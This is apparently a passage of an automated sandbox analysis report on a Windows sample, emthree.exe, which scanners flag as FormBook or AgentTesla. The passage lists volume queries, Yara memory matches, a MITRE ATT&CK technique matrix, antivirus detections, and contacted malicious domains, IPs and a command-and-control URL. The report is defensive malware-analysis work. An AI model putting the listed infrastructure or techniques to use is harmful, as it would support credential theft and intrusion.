Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery221	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Masquerading1	Input Capture1	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer4	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion3	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing13	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Timestomp1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	DLL Side-Loading1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
emthree.exe	41%	Metadefender		Browse
emthree.exe	65%	ReversingLabs	Win32.Trojan.AgentTesla
emthree.exe	100%	Avira	TR/Kryptik.zirmt
emthree.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.emthree.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.fontbureau.comu	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.amarilloautoexpress.com	23.27.109.19	true	true	unknown
porncamslivechat.com	184.154.50.243	true	true	unknown
www.porncamslivechat.com	unknown	unknown	true	unknown
www.asojebu.com	unknown	unknown	true	unknown
www.haircuressteampod.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.porncamslivechat.com/unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	false		high
